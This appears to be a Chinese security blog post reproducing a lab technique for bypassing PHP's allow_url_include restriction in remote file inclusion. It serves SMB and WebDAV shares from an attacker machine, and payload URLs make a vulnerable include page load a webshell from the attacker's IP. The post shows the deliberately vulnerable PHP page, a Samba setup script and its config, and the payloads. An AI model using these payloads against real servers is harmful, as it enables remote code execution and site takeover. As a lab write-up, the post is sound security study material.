RFI绕过限制getshell复现

  1. 操作的来源
  2. 复现操作
  3. 文件包含漏洞总结

操作的来源

在搜东西的时候翻到某篇文章,“RFI绕过限制getshell”。看到了一波奇淫技巧,就复现了一波
原文链接:RFI绕过URL包含限制getshell

由于原文有限制,限制如下:

smb只适用于内网
windows特性才能直接访问smb

之后我在群里看见某位老哥发了张图:
(使用Apache搭建webav也行)

复现操作

smb绕过
环境:

windows:phpstudy
Linux:samba,apache

在www目录下创建一个php(废话)

<?php
if($_GET['file']){
    $f=$_GET['file'];
    include "$f";
}
?>

将allow_url_fopen和allow_url_include改为Off,只改allow_url_include为Off也行。因为php.ini默认是这样的

将以下代码保存为sh文件在kali上运行:

#/usr/bin/bash

echo "[*] install samba..."
apt-get install -y samba

echo "[*] setssing smb and setssing smb.conf..."
mkdir /var/www/html/pub
chmod 0555 /var/www/html/pub
chown -R nobody:nogroup /var/www/html/pub
wget http://192.168.3.92/rfi/smb.conf
mv smb.conf /etc/samba/

echo "[*] setssing smb.conf success..."
echo "[*] start samba"
service smbd start

smb.conf配置文件:

[global]
workgroup=WORKGROUP
server string=Samba Server
netbios name=indishell-lab
security=user
map to guest=bad user
name resolve order=bcast host
dns proxy = no
bind interfaces only=yes

[ethan]
path=/var/www/html/pub
writable=no
guest ok=yes
guest only=yes
read only=yes
directory mode=0555
force user=nobody

安装完成后,在windows上输入\<Attack_IP>

在ethan文件夹上放入小马

执行以下payload:

http://127.0.0.1/rfi/rfi.php?file=\\192.168.241.132\ethan\demo.php

由于smb,smb里的php不能接受传参。所以只能放大马

apache搭建webav绕过
前面说到smb绕过有限制,必须在目标机的同个网段或内网里面,目标机必须是windows
在Ubuntu下搭建webdav教程:How to create a WebDAV server on Ubuntu and connect it to ONLYOFFICE - ONLYOFFICE

搭建好之后在Linux的文件管理器中输入dav://127.0.0.1/webdav可以看见如下图就代表成功了

执行以下payload:

http://127.0.0.1/rfi/rfi.php?file=//192.168.241.132//webdav/demo.php

文件包含漏洞总结

如图:


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:RFI绕过限制getshell复现

本文作者:九世

发布时间:2019-05-31, 18:07:22

最后更新:2019-05-31, 20:49:05

原始链接:http://422926799.github.io/posts/9b6dafa5.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录